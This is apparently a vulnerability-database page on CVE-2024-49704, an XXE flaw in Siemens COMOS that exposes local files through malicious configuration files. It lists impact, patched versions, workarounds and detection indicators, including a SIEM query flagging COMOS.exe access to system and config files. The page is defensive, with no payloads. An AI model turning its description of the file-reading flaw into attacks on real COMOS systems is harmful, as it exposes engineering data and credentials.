CVE-2024-49704
📋 TL;DR
This XXE vulnerability in Siemens COMOS software allows attackers to read arbitrary files from affected systems by tricking users into opening malicious configuration files. It affects multiple COMOS versions across V10.3 and V10.4 branches. Users who process untrusted configuration or mapping files are at risk.
💻 Affected Systems
- Siemens COMOS
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete file system disclosure including sensitive configuration files, credentials, and system files accessible to the COMOS process.
Likely Case
Extraction of known files from the local system or accessible network shares, potentially exposing sensitive engineering data or system information.
If Mitigated
Limited impact if file access is restricted through proper permissions and users only process trusted files.
🎯 Exploit Status
Requires social engineering to get user to open malicious file. Attacker needs knowledge of file paths to extract.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: V10.3.3.5.8, V10.4.3.0.47, V10.4.4.2, V10.4.4.1.21 or later
Vendor Advisory: https://cert-portal.siemens.com/productcert/html/ssa-701627.html
Restart Required: Yes
Instructions:
1. Download appropriate patch from Siemens support portal. 2. Backup COMOS installation. 3. Run installer with administrative privileges. 4. Restart affected COMOS services and applications.
🔧 Temporary Workarounds
Restrict XML parsing
allConfigure XML parsers to disable external entity resolution
File processing restrictions
allOnly process configuration/mapping files from trusted sources
🧯 If You Can't Patch
- Implement strict file access controls to limit what files COMOS process can read
- Train users to only open configuration files from trusted sources and verify file integrity
🔍 How to Verify
Check if Vulnerable:
Check COMOS version against affected versions list. Review if Generic Data Mapper, Engineering Adapter, or Engineering Interface components are in use.Check Version:
Check Help → About in COMOS application or review installation directory version filesVerify Fix Applied:
Verify installed version is equal to or greater than patched versions: V10.3.3.5.8, V10.4.3.0.47, V10.4.4.2, or V10.4.4.1.21📡 Detection & Monitoring
Log Indicators:
- Unusual file access patterns from COMOS processes
- Failed attempts to access system files
Network Indicators:
- Outbound connections to unexpected external entities during XML parsing
SIEM Query:
Process: COMOS.exe AND (FileAccess: *system* OR FileAccess: *config*) AND User: *